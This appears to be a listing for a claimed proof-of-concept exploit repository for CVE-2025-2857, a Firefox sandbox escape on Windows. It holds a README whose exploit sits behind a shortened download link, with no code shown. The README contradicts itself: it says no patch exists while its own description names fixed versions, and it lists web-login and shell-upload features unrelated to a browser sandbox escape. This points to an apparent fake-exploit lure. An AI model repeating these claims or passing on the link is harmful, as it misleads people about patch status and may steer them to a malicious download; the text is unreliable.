CVE-2025-2857 PoC — Mozilla Firefox and Mozilla Firefox ESR Security Vulnerability

Source
Associated Vulnerability
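Title: Mozilla Firefox and Mozilla Firefox ESR Security Vulnerability (CVE-2025-2857)
Description: Mozilla Firefox and Mozilla Firefox ESR are both products of the US-based Mozilla Foundation. Mozilla Firefox is an open-source web browser. Mozilla Firefox ESR is an extended support release of Firefox (the web browser). Mozilla Firefox versions before 136.0.4 and Mozilla Firefox ESR versions before 128.8.1 and before 115.21.1 contain a security vulnerability in which a compromised child process could cause the parent process to return an unintentionally powerful handle, leading to a sandbox escape.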
Readme
# CVE-2025-2857

## 📖Overview
A sandbox escape vulnerability in Firefox on Windows, discovered by Firefox developers. The vulnerability allows attackers to confuse the parent process into leaking handles into unprivileged child processes, potentially breaking the sandbox security model.

## Exploit
[Download here](https://tinyurl.com/nanhrvvy)
## Details
+ **CVE ID**: CVE-2025-2857
+ **Published**: 03/27/2025
+ **Impact**: Critical
+ **Exploit Availability**: Not public, only private.
+ **Patch Available**: (No official patch yet)
+ **CVSS**: 10
## Impact
Critical severity vulnerability that enables attackers to potentially:
+ Escape the browser's sandbox protection
+ Execute arbitrary code
+ Compromise system integrity
+ Gain unauthorized access to system resources

This vulnerability specifically targets Firefox on Windows and was being actively exploited in the wild.


## Exploit Features
+ ✅ Automated Exploitation – Extracts nonce, logs in, and uploads the shell automatically.
+ ✅ Version Check – Confirms if the target is vulnerable before exploitation.
+ ✅ Error Handling – Ensures smooth execution even in case of failures.
+ ✅ Session Handling – Uses persistent session management for authentication.
+ ✅ Real-time Feedback – Provides output at each step.



## Contact
+ **For inquiries, please contact: doppler21@outlook.com**
+ **Exploit**: [Download here](https://tinyurl.com/nanhrvvy)
File Snapshot

[4.0K] /data/pocs/1820f6e89b7a327335a6d8903c90169ee129b3ca
└── [1.4K] README.md

0 directories, 1 file